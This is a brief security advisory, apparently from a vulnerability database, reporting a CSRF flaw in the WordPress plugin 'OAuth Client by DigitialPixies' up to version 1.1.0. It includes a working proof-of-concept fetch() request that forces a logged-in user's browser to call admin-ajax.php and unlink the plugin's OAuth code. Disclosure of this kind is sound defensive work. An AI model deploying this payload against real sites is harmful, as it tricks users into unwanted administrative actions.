OAuth Client by DigitialPixies <= 1.1.0 - CSRF

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.

PoC

Make a logged in user visit a page with the following code fetch(‘https://example.com/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=dpt-oauth-ajax&call;=unlink_auth_code’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));